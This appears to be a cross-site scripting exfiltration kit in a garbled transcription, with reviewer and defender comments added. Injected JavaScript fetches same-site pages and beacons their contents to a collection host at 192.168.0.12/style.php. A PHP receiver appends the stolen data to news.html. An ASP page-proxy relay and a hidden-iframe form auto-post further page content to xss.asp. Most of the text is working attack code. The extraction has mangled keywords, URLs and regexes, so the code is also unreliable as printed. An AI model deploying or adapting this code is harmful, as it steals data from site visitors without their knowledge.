Js:
document. body. addBehavior ("# default # Download ");
// Lists two relative page names and requests each one through startDownload, passing GetData as the callback.
// NOTE(review): startDownload is presumably supplied by the "download" behavior attached on the line just above this run — confirm.
// Defender note: the page names are relative, so the requests go to whichever site is rendering this script. Script
// injection into that site is the precondition, which makes output encoding on the host page the primary control.
Var mycars = new Array ();
Mycars [0] = "l.htm ";
Mycars [1] = "y.htm ";
For (x in mycars)
{
// GetData is already registered as the callback; the extra call below passes `source`, which is not defined anywhere in the visible scope.
If (document. body. startDownload (mycars [x], GetData )){
GetData (source );
}
}
// Callback that receives the downloaded page text, encodes it with escape(), and forwards the result to getReaded.
// NOTE(review): as printed, `Txt`/`txt` and `GetReaded`/`getReaded` differ in case; this looks like a transcription artifact — confirm against the original.
Function GetData (source)
{
// Assigned without a declaration keyword, so as printed this is an implicit global.
Txt = escape (source );
GetReaded (txt );
}
// Sends `usr` to a fixed remote endpoint by assigning a URL to a new Image's src; the browser then issues a GET request
// for that URL with the data carried in the `Key` query parameter.
// Defender note: this is the image-beacon exfiltration pattern, i.e. an image request to another host with a long query string.
// A Content-Security-Policy with a restrictive `img-src` blocks the request, and proxy or web logs showing oversized
// query strings on image loads are a useful detection signal.
Function getReaded (usr ){
Var newimg = new Image ();
// The payload is wrapped in newline escapes on both sides; nothing here limits its length.
Newimg. src = "http: // 192.168.0.12/style. php? Key = "+" \ n "+" \ n "+ usr +" \ n "+" \ n ";
}
Php:
<? Php
// Declares the response as HTML in the GB2312 charset.
Header ('content-Type: text/html; charset = GB2312 ');
// Decodes a string produced by JavaScript escape(): URL-decodes it, splits it into tokens with the regex below,
// converts the tokens that match a known prefix from UCS-2 to UTF-8, and joins all tokens back into one string.
// NOTE(review): the two Elseif prefixes are empty strings as printed; given the 3- and 2-character substr() lengths they
// presumably held numeric-entity prefixes that were lost in extraction — confirm against the original.
// NOTE(review): the comparisons are printed with a single `=`; presumably `==` in the original — confirm.
Function unescape ($ str ){
$ Str = rawurldecode ($ str );
Preg_match_all ("/% u. {4} |. {4}; | \ d +; |. +/U", $ str, $ r );
$ Ar = $ r [0];
Foreach ($ ar as $ k => $ v ){
// %uXXXX token: the last four characters are read as hex digits and packed into two bytes.
If (substr ($ v, 0, 2) = "% u ")
$ Ar [$ k] = iconv ("UCS-2", "UTF-8", pack ("H4", substr ($ v,-4 )));
// Hex digits taken from offset 3 up to, but not including, the final character.
Elseif (substr ($ v, 0, 3) = "")
$ Ar [$ k] = iconv ("UCS-2", "UTF-8", pack ("H4", substr ($ v, 3,-1 )));
// Decimal value taken from offset 2 up to the final character and packed as a 16-bit big-endian integer.
Elseif (substr ($ v, 0, 2) = ""){
$ Ar [$ k] = iconv ("UCS-2", "UTF-8", pack ("n", substr ($ v, 2,-1 )));
}
}
Return join ("", $ ar );
}
// Decodes the `key` query parameter and appends it to news.html.
// NOTE(review): presumably this is the style.php endpoint that the JavaScript above requests with a `Key` parameter — the file name is not shown here, confirm.
// Defender note: the value is written with no validation, size limit or HTML encoding, and the fopen() result is neither
// checked nor closed. The path is relative, so the data lands beside the script; an unexpected, growing file written by
// a request handler is a forensic indicator worth checking during incident response.
$ File = "news.html ";
$ _ GET ['key'] = unescape ($ _ GET ['key']);
Fputs (fopen ($ file, 'a + '), $ _ GET ['key']);
?>
========================================================== =
<%
' Turns on response buffering, then fetches two fixed pages on 192.168.0.5 through PageWebProxy and keeps the
' escape()-encoded HTML in send(0) and send(1).
' sUrlB is declared here at script level; PageWebProxy writes it and getHTTPPage reads it.
Response. Buffer = True
Dim sUrlB, send (2)
Send (0) = escape (PageWebProxy ("http: // 192.168.0.5/sohu.htm "))
Send (1) = escape (PageWebProxy ("http: // 192.168.0.5/c.htm "))
' Fetches the page at xmlpath via getHTTPPage, rewrites its links with a sequence of regular-expression
' replacements, and returns the rewritten HTML.
' Side effect: sets the script-level sUrlB to the URL with any query string removed.
' NOTE(review): "limit Rev" as printed is presumably InStrRev mangled in transcription — confirm.
' NOTE(review): the patterns below contain inserted spaces and unbalanced parentheses as printed, so they cannot be
' relied on verbatim; the comments describe the apparent intent only.
' Defender note: this is a server-side fetch-and-rewrite relay. In the visible code xmlpath is only ever a hard-coded
' URL (the two calls just above this function); if it were taken from a request it would need a host allow-list so the
' page cannot act as an open proxy.
Function PageWebProxy (xmlpath)
Dim I, re, Url, Html
Url = xmlpath
Set re = New RegExp
Re. IgnoreCase = True
Re. Global = True
SUrlB = Url
Html = getHTTPPage (Url)
' Keep everything up to the last "/" as the base for relative links.
Url = Left (Url, limit Rev (Url ,"/"))
' Drop the query string from sUrlB.
I = InStr (sUrlB ,"? ")
If I> 0 Then
SUrlB = Left (sUrlB, I-1)
End If
' Links that consist only of a query string are pointed at sUrlB.
Re. Pattern = "(href | action) = (\ '| "")? (\?) "
Html = re. Replace (Html, "$1 = $2" & sUrlB &"? ")
' Attributes that already hold an absolute http/https/javascript URL are apparently renamed with an "x" suffix so the
' relative-link passes below skip them; the suffix is removed again further down.
Re. Pattern = "(src | action | href) = (\ '| "")? (Http | https | javascript): [A-Za-z0-9 \./= \? % \-&_~ '@ [\] \': +!] + ([^ <> ""]) +) (\ '| "")? "
Html = re. Replace (Html, "$ 1x = $2 $3 $2 ")
Re. Pattern = "(window \. open | url) \ (\ '| "")? (Http | https) :( \// |\\\\) [A-Za-z0-9 \./= \? % \-&_~ '@ [\]: +!] + ([^ \ '<> ""]) +) (\' | "")? \)"
Html = re. Replace (Html, "$ 1x ($2 $3 $2 )")
' Relative attribute values get the base directory (Url) prepended; root-relative ones get http://<host>/ where
' the host is Split (Url, "/") (2).
Re. Pattern = "(src | action | href | background) = (\ '| "")? ([^ \/"" \ '] [A-Za-z0-9 \./= \? % \-&_~ '@ [\]: +!] + ([^ \ '<> ""]) +) (\' | "")? "
Html = re. Replace (Html, "$1 = $2" & Url & "$3 $2 ")
Re. Pattern = "(src | action | href | background) = (\ '| "")? \/([^ "" \ '] [A-Za-z0-9 \./= \? % \-&_~ '@ [\]: +!] + ([^ \ '<> ""]) +) (\' | "")? "
Html = re. Replace (Html, "$1 = $2 http: //" & Split (Url, "/") (2) & "/$3 $2 ")
Re. Pattern = "(src | action | href) = (\ '| "")? \/(\ '| "")? "
Html = re. Replace (Html, "$1 = $2 http: //" & Split (Url, "/") (2) & "/$2 ")
' The same two rewrites, applied to window.open(...) and url(...) arguments.
Re. Pattern = "(window \. open | url) \ (\ '| "")? ([^ \/"" \ 'HTTP:] [A-Za-z0-9 \./= \? % \-&_~ '@ [\] +!] + ([^ \ '<> ""]) +) (\' | "")? \)"
Html = re. Replace (Html, "$1 ($2" & Url & "$3 $2 )")
Re. Pattern = "(window \. open | url) \ (\ '| "")? \/([^ "" \ 'HTTP:] [A-Za-z0-9 \./= \? % \-&_~ '@ [\] +!] + ([^ \ '<> ""]) +) (\' | "")? \)"
Html = re. replace (Html, "$1 ($2 http: //" & Split (Url, "/") (2) & "/$3 $2 )")
' Every "&" is encoded first, then selected encoded entities are mapped back to characters.
Html = Replace (Html, "&", "% 26 ")
' Host-specific exception for club.isso.com.cn.
If Split (Url, "/") (2) = "club.isso.com.cn" Then
Html = Replace (Html, "% 26amp;", "% 26 ")
Else
Html = Replace (Html, "% 26amp ;","&")
End If
Html = Replace (Html, "% 26 nbsp ;","")
Html = Replace (Html, "% 26lt;", "<")
Html = Replace (Html, "% 26gt;", "> ")
Html = Replace (Html, "% 26 quot ;",""")
Html = Replace (Html, "% 26 copy ;","")
Html = Replace (Html, "% 26reg ;","")
Html = Replace (Html, "% 26 raquo ;","»")
Html = Replace (Html, "% 26% 26 ","&&")
Html = Replace (Html, "% 26 #","")
'Html = Replace (Html, "% 26 ","")
' Restore the attributes that were renamed with the "x" suffix earlier.
Re. Pattern = "(src | action | href) x = (\ '| "")? (Http | https | javascript): [A-Za-z0-9 \./= \? % \-&_~ '@ [\] \': +!] + ([^ <> ""]) +) (\ '| "")? "
Html = re. Replace (Html, "$1 = $2 $3 $2 ")
' Absolute URLs are rewritten to a "?Url=" form, presumably so that followed links are requested through this page again;
' the code that would read such a parameter is not in the visible source.
Re. Pattern = "(http | https) :( \// |\\\\) [A-Za-z0-9 \./= \? % \-&_~ '@ [\] \': +!] + ([^ <> ""]) +) "'" (Gif | jpg | bmp | png ))"
Html = re. Replace (Html ,"? Url = $1 ")
Re. Pattern = "\? Url = "& Url &" (# | javascript :)"
Html = re. Replace (Html, "$1 ")
' Remove multipart/form-data from the markup; getHTTPPage relays form posts as application/x-www-form-urlencoded.
Re. Pattern = "multipart \/form-data"
Html = re. Replace (Html ,"")
PageWebProxy = Html
End function
' Requests url synchronously with MSXML2.XMLHTTP and either streams the body straight to the client or returns it as text.
' If the incoming request carries form fields they are URL-encoded and sent on as a POST; otherwise a GET is issued.
' Returns the body decoded as GB2312 when the URL's extension is in neither list below; on the other paths the
' return value is never assigned.
' NOTE(review): "limit Rev" as printed is presumably InStrRev mangled in transcription — confirm.
' NOTE(review): the early Exit Function and the Response.End path leave without reaching Set Http = Nothing.
' Defender note: every field of the incoming form is relayed to the target URL, and no response status check or
' size limit is visible here.
Function getHTTPPage (url)
Dim Http, theStr, fileExt
Set Http = Server. CreateObject ("MSXML2.XMLHTTP ")
If Request. Form. Count> 0 Then
For Each x In Request. Form
TheStr = theStr & Server. UrlEncode (x) & "=" & Server. UrlEncode (Request. Form (x ))&"&"
Next
' Third argument False makes the request synchronous.
Http. Open "POST", url, False
Http. SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http. Send (theStr)
Else
Http. Open "GET", url, False
Http. Send ()
End If
If Http. readystate <> 4 then Exit Function
' The text after the last "." in the URL decides how the body is handled.
FileExt = LCase (Mid (url, limit Rev (url, ".") + 1 ))
' Images and scripts: discard buffered output, write the raw bytes, and end the response.
If InStr ("$ jpg $ gif $ bmp $ png $ js $", "$" & fileExt & "$")> 0 Then
Response. Clear
Response. BinaryWrite Http. responseBody
Response. End ()
Else
' Archives and executables: sent as an attachment. The file name is the tail of sUrlB, placed in the header as-is.
If InStr ("$ rar $ mdb $ zip $ exe $ com $ ico $", "$" & fileExt & "$")> 0 Then
Response. AddHeader "Content-Disposition", "Attachment; Filename =" & Mid (sUrlB, limit Rev (sUrlB, "/") + 1)
Response. BinaryWrite Http. responseBody
Response. Flush
Else
GetHTTPPage = bytesToBSTR (Http. responseBody, "GB2312 ")
End If
End If
Set Http = Nothing
End Function
' Converts a byte array (body) to a string in the charset named by Cset, using an ADODB.Stream as the converter.
' The bytes are written in binary mode, the stream is rewound and switched to text mode, and the text is read back.
Function BytesToBstr (body, Cset)
Dim objstream
Set objstream = Server. CreateObject ("adodb. stream ")
' Type 1 = binary, Mode 3 = read/write.
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write body
' Rewind, then reinterpret the same bytes as text (Type 2) in the requested charset.
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
BytesToBstr = objstream. ReadText
Objstream. Close
Set objstream = nothing
End Function
%>
// Client-side script emitted after the ASP block: writes a hidden iframe and a form that targets it, fills two hidden
// fields, and submits the form immediately.
// Each field value is a page URL followed by the server-rendered send(0) / send(1) content passed through unescape().
// Defender note: an auto-submitted form posting to another host inside a hidden iframe moves page content off-site
// with no visible navigation. A Content-Security-Policy `form-action` directive limits where forms may post, and
// outbound POSTs to unfamiliar hosts from hidden frames are worth alerting on.
Document. writeln ("<iframe name = \" mimi \ "src = about: blank style = display: none> <\/iframe> ")
Document. writeln ("<form id = form action = http: \// 192.168.0.12 \/xss. asp method = POST target = mimi> ");
Document. writeln ("<input id = var name = var type = hidden> ");
Document. writeln ("<input id = vartwo name = vartwo type = hidden> ");
Document. writeln ("<input type = submit style = display: none> ");
Document. writeln ("<\/form> ")
// The <% = ... %> expressions are filled in by the server before this script reaches the browser.
Document. getElementById ("var"). value = 'HTTP: // 192.168.0.5/sohu.htm' + unescape ('<% = send (0) %> ');
Document. getElementById ("vartwo"). value = 'HTTP: // 192.168.0.5/c.htm' + unescape ('<% = send (1) %> ');
Document. getElementById ("form"). submit ();